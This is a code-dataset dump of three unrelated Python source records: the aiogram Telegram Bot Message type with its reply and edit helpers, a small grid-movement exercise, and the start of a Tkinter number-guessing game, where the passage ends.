+{"seq_id":"8227600133","text":"import datetime\nimport functools\nimport sys\nimport typing\n\nfrom . import base\nfrom . 
import fields\nfrom .animation import Animation\nfrom .audio import Audio\nfrom .chat import Chat\nfrom .contact import Contact\nfrom .document import Document\nfrom .game import Game\nfrom .invoice import Invoice\nfrom .location import Location\nfrom .message_entity import MessageEntity\nfrom .passport_data import PassportData\nfrom .photo_size import PhotoSize\nfrom .sticker import Sticker\nfrom .successful_payment import SuccessfulPayment\nfrom .user import User\nfrom .venue import Venue\nfrom .video import Video\nfrom .video_note import VideoNote\nfrom .voice import Voice\nfrom ..utils import helper\nfrom ..utils import markdown as md\n\n\nclass Message(base.TelegramObject):\n \"\"\"\n This object represents a message.\n\n https://core.telegram.org/bots/api#message\n \"\"\"\n message_id: base.Integer = fields.Field()\n from_user: User = fields.Field(alias='from', base=User)\n date: datetime.datetime = fields.DateTimeField()\n chat: Chat = fields.Field(base=Chat)\n forward_from: User = fields.Field(base=User)\n forward_from_chat: Chat = fields.Field(base=Chat)\n forward_from_message_id: base.Integer = fields.Field()\n forward_signature: base.String = fields.Field()\n forward_date: datetime.datetime = fields.DateTimeField()\n reply_to_message: 'Message' = fields.Field(base='Message')\n edit_date: datetime.datetime = fields.DateTimeField()\n media_group_id: base.String = fields.Field()\n author_signature: base.String = fields.Field()\n text: base.String = fields.Field()\n entities: typing.List[MessageEntity] = fields.ListField(base=MessageEntity)\n caption_entities: typing.List[MessageEntity] = fields.ListField(base=MessageEntity)\n audio: Audio = fields.Field(base=Audio)\n document: Document = fields.Field(base=Document)\n animation: Animation = fields.Field(base=Animation)\n game: Game = fields.Field(base=Game)\n photo: typing.List[PhotoSize] = fields.ListField(base=PhotoSize)\n sticker: Sticker = fields.Field(base=Sticker)\n video: Video = fields.Field(base=Video)\n voice: Voice = fields.Field(base=Voice)\n video_note: VideoNote = fields.Field(base=VideoNote)\n caption: base.String = fields.Field()\n contact: Contact = fields.Field(base=Contact)\n location: Location = fields.Field(base=Location)\n venue: Venue = fields.Field(base=Venue)\n new_chat_members: typing.List[User] = fields.ListField(base=User)\n left_chat_member: User = fields.Field(base=User)\n new_chat_title: base.String = fields.Field()\n new_chat_photo: typing.List[PhotoSize] = fields.ListField(base=PhotoSize)\n delete_chat_photo: base.Boolean = fields.Field()\n group_chat_created: base.Boolean = fields.Field()\n supergroup_chat_created: base.Boolean = fields.Field()\n channel_chat_created: base.Boolean = fields.Field()\n migrate_to_chat_id: base.Integer = fields.Field()\n migrate_from_chat_id: base.Integer = fields.Field()\n pinned_message: 'Message' = fields.Field(base='Message')\n invoice: Invoice = fields.Field(base=Invoice)\n successful_payment: SuccessfulPayment = fields.Field(base=SuccessfulPayment)\n connected_website: base.String = fields.Field()\n passport_data: PassportData = fields.Field(base=PassportData)\n\n @property\n @functools.lru_cache()\n def content_type(self):\n if self.text:\n return ContentType.TEXT[0]\n elif self.audio:\n return ContentType.AUDIO[0]\n elif self.animation:\n return ContentType.ANIMATION[0]\n elif self.document:\n return ContentType.DOCUMENT[0]\n elif self.game:\n return ContentType.GAME[0]\n elif self.photo:\n return ContentType.PHOTO[0]\n elif self.sticker:\n return 
ContentType.STICKER[0]\n elif self.video:\n return ContentType.VIDEO[0]\n elif self.video_note:\n return ContentType.VIDEO_NOTE[0]\n elif self.voice:\n return ContentType.VOICE[0]\n elif self.contact:\n return ContentType.CONTACT[0]\n elif self.venue:\n return ContentType.VENUE[0]\n elif self.location:\n return ContentType.LOCATION[0]\n elif self.new_chat_members:\n return ContentType.NEW_CHAT_MEMBERS[0]\n elif self.left_chat_member:\n return ContentType.LEFT_CHAT_MEMBER[0]\n elif self.invoice:\n return ContentType.INVOICE[0]\n elif self.successful_payment:\n return ContentType.SUCCESSFUL_PAYMENT[0]\n elif self.connected_website:\n return ContentType.CONNECTED_WEBSITE[0]\n elif self.migrate_from_chat_id:\n return ContentType.MIGRATE_FROM_CHAT_ID[0]\n elif self.migrate_to_chat_id:\n return ContentType.MIGRATE_TO_CHAT_ID[0]\n elif self.pinned_message:\n return ContentType.PINNED_MESSAGE[0]\n elif self.new_chat_title:\n return ContentType.NEW_CHAT_TITLE[0]\n elif self.new_chat_photo:\n return ContentType.NEW_CHAT_PHOTO[0]\n elif self.delete_chat_photo:\n return ContentType.DELETE_CHAT_PHOTO[0]\n elif self.group_chat_created:\n return ContentType.GROUP_CHAT_CREATED[0]\n elif self.passport_data:\n return ContentType.PASSPORT_DATA[0]\n else:\n return ContentType.UNKNOWN[0]\n\n def is_command(self):\n \"\"\"\n Check message text is command\n\n :return: bool\n \"\"\"\n return self.text and self.text.startswith('/')\n\n def get_full_command(self):\n \"\"\"\n Split command and args\n\n :return: tuple of (command, args)\n \"\"\"\n if self.is_command():\n command, _, args = self.text.partition(' ')\n return command, args\n\n def get_command(self, pure=False):\n \"\"\"\n Get command from message\n\n :return:\n \"\"\"\n command = self.get_full_command()\n if command:\n command = command[0]\n if pure:\n command, _, _ = command[1:].partition('@')\n return command\n\n def get_args(self):\n \"\"\"\n Get arguments\n\n :return:\n \"\"\"\n command = self.get_full_command()\n if command:\n return command[1].strip()\n\n def parse_entities(self, as_html=True):\n \"\"\"\n Text or caption formatted as HTML or Markdown.\n\n :return: str\n \"\"\"\n\n text = self.text or self.caption\n if text is None:\n raise TypeError(\"This message doesn't have any text.\")\n\n quote_fn = md.quote_html if as_html else md.escape_md\n\n if not self.entities:\n return quote_fn(text)\n\n if not sys.maxunicode == 0xffff:\n text = text.encode('utf-16-le')\n\n result = ''\n offset = 0\n\n for entity in sorted(self.entities, key=lambda item: item.offset):\n entity_text = entity.parse(text, as_html=as_html)\n\n if sys.maxunicode == 0xffff:\n part = text[offset:entity.offset]\n result += quote_fn(part) + entity_text\n else:\n part = text[offset * 2:entity.offset * 2]\n result += quote_fn(part.decode('utf-16-le')) + entity_text\n\n offset = entity.offset + entity.length\n\n if sys.maxunicode == 0xffff:\n part = text[offset:]\n result += quote_fn(part)\n else:\n part = text[offset * 2:]\n result += quote_fn(part.decode('utf-16-le'))\n\n return result\n\n @property\n def md_text(self) -> str:\n \"\"\"\n Text or caption formatted as markdown.\n\n :return: str\n \"\"\"\n return self.parse_entities(False)\n\n @property\n def html_text(self) -> str:\n \"\"\"\n Text or caption formatted as HTML\n\n :return: str\n \"\"\"\n return self.parse_entities()\n\n async def reply(self, text, parse_mode=None, disable_web_page_preview=None,\n disable_notification=None, reply_markup=None, reply=True) -> 'Message':\n \"\"\"\n Reply to this message\n\n :param 
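parse_entities above doubles every offset on wide Python builds because Telegram measures entity offsets in UTF-16 code units, while Python 3 strings index by code point. The two diverge as soon as a character outside the Basic Multilingual Plane, such as an emoji, precedes the entity. A small self-contained demonstration:

text = "Hi 😀 /start"
offset, length = 6, 6                 # entity for "/start" in UTF-16 units
assert len(text) == 11                # 11 code points, but 12 UTF-16 units
encoded = text.encode("utf-16-le")    # 2 bytes per UTF-16 code unit
part = encoded[offset * 2:(offset + length) * 2].decode("utf-16-le")
assert part == "/start"

Slicing the original string at text[6:12] would instead start one character too late (yielding "start"), which is exactly the mismatch the encode/decode round trip avoids.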
text: str\n :param parse_mode: str\n :param disable_web_page_preview: bool\n :param disable_notification: bool\n :param reply_markup:\n :param reply: fill 'reply_to_message_id'\n :return: :class:`aiogram.types.Message`\n \"\"\"\n return await self.bot.send_message(chat_id=self.chat.id, text=text,\n parse_mode=parse_mode,\n disable_web_page_preview=disable_web_page_preview,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def reply_photo(self, photo: typing.Union[base.InputFile, base.String],\n caption: typing.Union[base.String, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None, reply=True) -> 'Message':\n \"\"\"\n Use this method to send photos.\n\n Source: https://core.telegram.org/bots/api#sendphoto\n\n :param photo: Photo to send.\n :type photo: :obj:`typing.Union[base.InputFile, base.String]`\n :param caption: Photo caption (may also be used when resending photos by file_id), 0-200 characters\n :type caption: :obj:`typing.Union[base.String, None]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_photo(chat_id=self.chat.id, photo=photo, caption=caption,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def reply_audio(self, audio: typing.Union[base.InputFile, base.String],\n caption: typing.Union[base.String, None] = None,\n duration: typing.Union[base.Integer, None] = None,\n performer: typing.Union[base.String, None] = None,\n title: typing.Union[base.String, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None,\n reply=True) -> 'Message':\n \"\"\"\n Use this method to send audio files, if you want Telegram clients to display them in the music player.\n Your audio must be in the .mp3 format.\n\n For sending voice messages, use the sendVoice method instead.\n\n Source: https://core.telegram.org/bots/api#sendaudio\n\n :param audio: Audio file to send.\n :type audio: :obj:`typing.Union[base.InputFile, base.String]`\n :param caption: Audio caption, 0-200 characters\n :type caption: :obj:`typing.Union[base.String, None]`\n :param duration: Duration of the audio in seconds\n :type duration: :obj:`typing.Union[base.Integer, None]`\n :param performer: Performer\n :type performer: :obj:`typing.Union[base.String, None]`\n :param title: Track name\n :type title: :obj:`typing.Union[base.String, None]`\n :param disable_notification: Sends the message silently. 
Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_audio(chat_id=self.chat.id,\n audio=audio,\n caption=caption,\n duration=duration,\n performer=performer,\n title=title,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def reply_document(self, document: typing.Union[base.InputFile, base.String],\n caption: typing.Union[base.String, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None,\n reply=True) -> 'Message':\n \"\"\"\n Use this method to send general files.\n\n Bots can currently send files of any type of up to 50 MB in size, this limit may be changed in the future.\n\n Source: https://core.telegram.org/bots/api#senddocument\n\n :param document: File to send.\n :type document: :obj:`typing.Union[base.InputFile, base.String]`\n :param caption: Document caption (may also be used when resending documents by file_id), 0-200 characters\n :type caption: :obj:`typing.Union[base.String, None]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply], None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_document(chat_id=self.chat.id,\n document=document,\n caption=caption,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def reply_video(self, video: typing.Union[base.InputFile, base.String],\n duration: typing.Union[base.Integer, None] = None,\n width: typing.Union[base.Integer, None] = None,\n height: typing.Union[base.Integer, None] = None,\n caption: typing.Union[base.String, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None,\n reply=True) -> 'Message':\n \"\"\"\n Use this method to send video files, Telegram clients support mp4 videos\n (other formats may be sent as Document).\n\n Source: https://core.telegram.org/bots/api#sendvideo\n\n :param video: Video to send.\n :type video: :obj:`typing.Union[base.InputFile, base.String]`\n :param duration: Duration of sent video in seconds\n :type duration: :obj:`typing.Union[base.Integer, None]`\n :param width: Video width\n :type width: :obj:`typing.Union[base.Integer, None]`\n :param height: Video height\n :type height: :obj:`typing.Union[base.Integer, None]`\n :param caption: Video caption (may also be used when resending videos by file_id), 0-200 characters\n :type caption: :obj:`typing.Union[base.String, None]`\n :param disable_notification: Sends the message silently. 
Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_video(chat_id=self.chat.id,\n video=video,\n duration=duration,\n width=width,\n height=height,\n caption=caption,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def reply_voice(self, voice: typing.Union[base.InputFile, base.String],\n caption: typing.Union[base.String, None] = None,\n duration: typing.Union[base.Integer, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None,\n reply=True) -> 'Message':\n \"\"\"\n Use this method to send audio files, if you want Telegram clients to display the file\n as a playable voice message.\n\n For this to work, your audio must be in an .ogg file encoded with OPUS\n (other formats may be sent as Audio or Document).\n\n Source: https://core.telegram.org/bots/api#sendvoice\n\n :param voice: Audio file to send.\n :type voice: :obj:`typing.Union[base.InputFile, base.String]`\n :param caption: Voice message caption, 0-200 characters\n :type caption: :obj:`typing.Union[base.String, None]`\n :param duration: Duration of the voice message in seconds\n :type duration: :obj:`typing.Union[base.Integer, None]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_voice(chat_id=self.chat.id,\n voice=voice,\n caption=caption,\n duration=duration,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def reply_video_note(self, video_note: typing.Union[base.InputFile, base.String],\n duration: typing.Union[base.Integer, None] = None,\n length: typing.Union[base.Integer, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None,\n reply=True) -> 'Message':\n \"\"\"\n As of v.4.0, Telegram clients support rounded square mp4 videos of up to 1 minute long.\n Use this method to send video messages.\n\n Source: https://core.telegram.org/bots/api#sendvideonote\n\n :param video_note: Video note to send.\n :type video_note: :obj:`typing.Union[base.InputFile, base.String]`\n :param duration: Duration of sent video in seconds\n :type duration: :obj:`typing.Union[base.Integer, None]`\n :param length: Video width and height\n :type length: :obj:`typing.Union[base.Integer, None]`\n :param disable_notification: Sends the message silently. 
Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_video_note(chat_id=self.chat.id,\n video_note=video_note,\n duration=duration,\n length=length,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def reply_media_group(self, media: typing.Union['MediaGroup', typing.List],\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply=True) -> typing.List['Message']:\n \"\"\"\n Use this method to send a group of photos or videos as an album.\n\n Source: https://core.telegram.org/bots/api#sendmediagroup\n\n :param media: A JSON-serialized array describing photos and videos to be sent\n :type media: :obj:`typing.Union[types.MediaGroup, typing.List]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, an array of the sent Messages is returned.\n :rtype: typing.List[types.Message]\n \"\"\"\n return await self.bot.send_media_group(self.chat.id,\n media=media,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None)\n\n async def reply_location(self, latitude: base.Float,\n longitude: base.Float, live_period: typing.Union[base.Integer, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None,\n reply=True) -> 'Message':\n \"\"\"\n Use this method to send point on the map.\n\n Source: https://core.telegram.org/bots/api#sendlocation\n\n :param latitude: Latitude of the location\n :type latitude: :obj:`base.Float`\n :param longitude: Longitude of the location\n :type longitude: :obj:`base.Float`\n :param live_period: Period in seconds for which the location will be updated\n :type live_period: :obj:`typing.Union[base.Integer, None]`\n :param disable_notification: Sends the message silently. 
Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_location(chat_id=self.chat.id,\n latitude=latitude,\n longitude=longitude,\n live_period=live_period,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def edit_live_location(self, latitude: base.Float, longitude: base.Float,\n reply_markup=None) -> 'Message' or base.Boolean:\n \"\"\"\n Use this method to edit live location messages sent by the bot or via the bot (for inline bots).\n A location can be edited until its live_period expires or editing is explicitly disabled by a call\n to stopMessageLiveLocation.\n\n Source: https://core.telegram.org/bots/api#editmessagelivelocation\n\n :param latitude: Latitude of new location\n :type latitude: :obj:`base.Float`\n :param longitude: Longitude of new location\n :type longitude: :obj:`base.Float`\n :param reply_markup: A JSON-serialized object for a new inline keyboard.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup, None]`\n :return: On success, if the edited message was sent by the bot, the edited Message is returned,\n otherwise True is returned.\n :rtype: :obj:`typing.Union[types.Message, base.Boolean]`\n \"\"\"\n return await self.bot.edit_message_live_location(latitude=latitude, longitude=longitude,\n chat_id=self.chat.id, message_id=self.message_id,\n reply_markup=reply_markup)\n\n async def stop_live_location(self, reply_markup=None) -> 'Message' or base.Boolean:\n \"\"\"\n Use this method to stop updating a live location message sent by the bot or via the bot\n (for inline bots) before live_period expires.\n\n Source: https://core.telegram.org/bots/api#stopmessagelivelocation\n\n :param reply_markup: A JSON-serialized object for a new inline keyboard.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup, None]`\n :return: On success, if the message was sent by the bot, the sent Message is returned,\n otherwise True is returned.\n :rtype: :obj:`typing.Union[types.Message, base.Boolean]`\n \"\"\"\n return await self.bot.stop_message_live_location(chat_id=self.chat.id, message_id=self.message_id,\n reply_markup=reply_markup)\n\n async def send_venue(self, latitude: base.Float, longitude: base.Float, title: base.String, address: base.String,\n foursquare_id: typing.Union[base.String, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None,\n reply=True) -> 'Message':\n \"\"\"\n Use this method to send information about a venue.\n\n Source: https://core.telegram.org/bots/api#sendvenue\n\n :param latitude: Latitude of the venue\n :type latitude: :obj:`base.Float`\n :param longitude: Longitude of the venue\n :type longitude: :obj:`base.Float`\n :param title: Name of the venue\n :type title: :obj:`base.String`\n :param address: Address of the venue\n :type address: :obj:`base.String`\n :param foursquare_id: Foursquare identifier of the venue\n :type foursquare_id: :obj:`typing.Union[base.String, None]`\n :param disable_notification: Sends the message silently. 
Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_venue(chat_id=self.chat.id,\n latitude=latitude,\n longitude=longitude,\n title=title,\n address=address,\n foursquare_id=foursquare_id,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def send_contact(self, phone_number: base.String,\n first_name: base.String, last_name: typing.Union[base.String, None] = None,\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None,\n reply=True) -> 'Message':\n \"\"\"\n Use this method to send phone contacts.\n\n Source: https://core.telegram.org/bots/api#sendcontact\n\n :param phone_number: Contact's phone number\n :type phone_number: :obj:`base.String`\n :param first_name: Contact's first name\n :type first_name: :obj:`base.String`\n :param last_name: Contact's last name\n :type last_name: :obj:`typing.Union[base.String, None]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_contact(chat_id=self.chat.id,\n phone_number=phone_number,\n first_name=first_name, last_name=last_name,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def forward(self, chat_id, disable_notification=None) -> 'Message':\n \"\"\"\n Forward this message\n\n :param chat_id:\n :param disable_notification:\n :return:\n \"\"\"\n return await self.bot.forward_message(chat_id, self.chat.id, self.message_id, disable_notification)\n\n async def edit_text(self, text: base.String,\n parse_mode: typing.Union[base.String, None] = None,\n disable_web_page_preview: typing.Union[base.Boolean, None] = None,\n reply_markup=None):\n \"\"\"\n Use this method to edit text and game messages sent by the bot or via the bot (for inline bots).\n\n Source: https://core.telegram.org/bots/api#editmessagetext\n\n :param text: New text of the message\n :type text: :obj:`base.String`\n :param parse_mode: Send Markdown or HTML, if you want Telegram apps to show bold, italic,\n fixed-width text or inline URLs in your bot's message.\n :type parse_mode: :obj:`typing.Union[base.String, None]`\n :param disable_web_page_preview: Disables link previews for links in this message\n :type disable_web_page_preview: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: A JSON-serialized object for an inline keyboard.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup, None]`\n :return: On success, if edited message is sent by the bot,\n the edited Message is returned, otherwise True is returned.\n :rtype: 
:obj:`typing.Union[types.Message, base.Boolean]`\n \"\"\"\n return await self.bot.edit_message_text(text=text,\n chat_id=self.chat.id, message_id=self.message_id,\n parse_mode=parse_mode,\n disable_web_page_preview=disable_web_page_preview,\n reply_markup=reply_markup)\n\n async def delete(self):\n \"\"\"\n Delete this message\n\n :return: bool\n \"\"\"\n return await self.bot.delete_message(self.chat.id, self.message_id)\n\n async def reply_sticker(self, sticker: typing.Union[base.InputFile, base.String],\n disable_notification: typing.Union[base.Boolean, None] = None,\n reply_markup=None, reply=True) -> 'Message':\n \"\"\"\n Use this method to send .webp stickers.\n\n Source: https://core.telegram.org/bots/api#sendsticker\n\n :param sticker: Sticker to send.\n :type sticker: :obj:`typing.Union[base.InputFile, base.String]`\n :param disable_notification: Sends the message silently. Users will receive a notification with no sound.\n :type disable_notification: :obj:`typing.Union[base.Boolean, None]`\n :param reply_markup: Additional interface options.\n :type reply_markup: :obj:`typing.Union[types.InlineKeyboardMarkup,\n types.ReplyKeyboardMarkup, types.ReplyKeyboardRemove, types.ForceReply, None]`\n :param reply: fill 'reply_to_message_id'\n :return: On success, the sent Message is returned.\n :rtype: :obj:`types.Message`\n \"\"\"\n return await self.bot.send_sticker(chat_id=self.chat.id, sticker=sticker,\n disable_notification=disable_notification,\n reply_to_message_id=self.message_id if reply else None,\n reply_markup=reply_markup)\n\n async def pin(self, disable_notification: bool = False):\n \"\"\"\n Pin message\n\n :param disable_notification:\n :return:\n \"\"\"\n return await self.chat.pin_message(self.message_id, disable_notification)\n\n def __int__(self):\n return self.message_id\n\n\nclass ContentType(helper.Helper):\n \"\"\"\n List of message content types\n\n :key: TEXT\n :key: AUDIO\n :key: DOCUMENT\n :key: GAME\n :key: PHOTO\n :key: STICKER\n :key: VIDEO\n :key: VIDEO_NOTE\n :key: VOICE\n :key: CONTACT\n :key: LOCATION\n :key: VENUE\n :key: NEW_CHAT_MEMBERS\n :key: LEFT_CHAT_MEMBER\n :key: INVOICE\n :key: SUCCESSFUL_PAYMENT\n :key: CONNECTED_WEBSITE\n :key: MIGRATE_TO_CHAT_ID\n :key: MIGRATE_FROM_CHAT_ID\n :key: UNKNOWN\n :key: ANY\n \"\"\"\n mode = helper.HelperMode.snake_case\n\n TEXT = helper.ListItem() # text\n AUDIO = helper.ListItem() # audio\n DOCUMENT = helper.ListItem() # document\n ANIMATION = helper.ListItem() # animation\n GAME = helper.ListItem() # game\n PHOTO = helper.ListItem() # photo\n STICKER = helper.ListItem() # sticker\n VIDEO = helper.ListItem() # video\n VIDEO_NOTE = helper.ListItem() # video_note\n VOICE = helper.ListItem() # voice\n CONTACT = helper.ListItem() # contact\n LOCATION = helper.ListItem() # location\n VENUE = helper.ListItem() # venue\n NEW_CHAT_MEMBERS = helper.ListItem() # new_chat_member\n LEFT_CHAT_MEMBER = helper.ListItem() # left_chat_member\n INVOICE = helper.ListItem() # invoice\n SUCCESSFUL_PAYMENT = helper.ListItem() # successful_payment\n CONNECTED_WEBSITE = helper.ListItem() # connected_website\n MIGRATE_TO_CHAT_ID = helper.ListItem() # migrate_to_chat_id\n MIGRATE_FROM_CHAT_ID = helper.ListItem() # migrate_from_chat_id\n PINNED_MESSAGE = helper.ListItem() # pinned_message\n NEW_CHAT_TITLE = helper.ListItem() # new_chat_title\n NEW_CHAT_PHOTO = helper.ListItem() # new_chat_photo\n DELETE_CHAT_PHOTO = helper.ListItem() # delete_chat_photo\n GROUP_CHAT_CREATED = helper.ListItem() # group_chat_created\n PASSPORT_DATA = 
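The Message class above wraps most Bot send_* calls as reply_* helpers that pre-fill chat_id and, when reply=True, reply_to_message_id. A hedged usage sketch in the aiogram v2 handler style this file belongs to; the token and sticker file_id are placeholders:

from aiogram import Bot, Dispatcher, types
from aiogram.utils import executor

bot = Bot(token="123456:PLACEHOLDER")    # placeholder token
dp = Dispatcher(bot)

@dp.message_handler(commands=["start"])
async def on_start(message: types.Message):
    await message.reply("Hello!")        # pre-fills reply_to_message_id
    if message.get_args():               # text after the command, if any
        await message.reply_sticker("CAACAgIAAxk...")  # placeholder file_id

# executor.start_polling(dp)             # would start the long-polling loop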
helper.ListItem() # passport_data\n\n UNKNOWN = helper.ListItem() # unknown\n ANY = helper.ListItem() # any\n\n\nclass ParseMode(helper.Helper):\n \"\"\"\n Parse modes\n\n :key: MARKDOWN\n :key: HTML\n \"\"\"\n\n mode = helper.HelperMode.lowercase\n\n MARKDOWN = helper.Item()\n HTML = helper.Item()\n","repo_name":"MohammadKakuei/articlebot","sub_path":"Lib/site-packages/aiogram/types/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":37411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72207043026","text":"import sys\n\nN = int(sys.stdin.readline())\nplan = sys.stdin.readline().split()\npos = (1, 1)\n\n\ndef move(drct, pos):\n if drct == 'U' and pos[0] != 1:\n return pos[0] - 1, pos[1]\n elif drct == 'D' and pos[0] != N:\n return pos[0] + 1, pos[1]\n elif drct == 'R' and pos[1] != N:\n return pos[0], pos[1] + 1\n elif drct == 'L' and pos[1] != 1:\n return pos[0], pos[1] - 1\n else:\n return pos\n\n\nfor i in range(len(plan)):\n pos = move(plan[i], pos)\n\nprint(*pos)","repo_name":"camp5803/data_structure_c_py","sub_path":"algorithms/ict_3_3.py","file_name":"ict_3_3.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71397949587","text":"import tkinter as tk #Importing the Tkinter package.\r\nfrom tkinter import * #Importing everything from Tkinter library.\r\nimport random #Importing random module to take Random values.\r\n\r\nglobal no #Declaring global variables.\r\nglobal score #Declaring global variables.\r\nroot = Tk()\r\nroot.title(\"Guess Game\") #The title of the game window\r\nroot.geometry('600x400') #The size of the game window\r\nroot.configure(bg=\"light green\") #The color of the background in the game window.\r\nno = random.randint(1, 100) #Storing any random number between 1-100 in \"no\" variable\r\nscore = 0 #Variable to keep track of the player score\r\nchoice = IntVar() #Value holder for integer variable. 
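The ict_3_3.py record above clamps U/D/L/R moves to an N x N board by refusing any step that would leave the grid. A quick self-check of that logic with N = 3 and the same 1-indexed (row, column) convention:

N = 3

def move(drct, pos):                  # same clamped-move logic as above
    if drct == 'U' and pos[0] != 1:
        return pos[0] - 1, pos[1]
    elif drct == 'D' and pos[0] != N:
        return pos[0] + 1, pos[1]
    elif drct == 'R' and pos[1] != N:
        return pos[0], pos[1] + 1
    elif drct == 'L' and pos[1] != 1:
        return pos[0], pos[1] - 1
    return pos

pos = (1, 1)
for d in ['R', 'R', 'D', 'L', 'U', 'U']:
    pos = move(d, pos)                # the final 'U' is ignored at row 1
assert pos == (1, 2)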
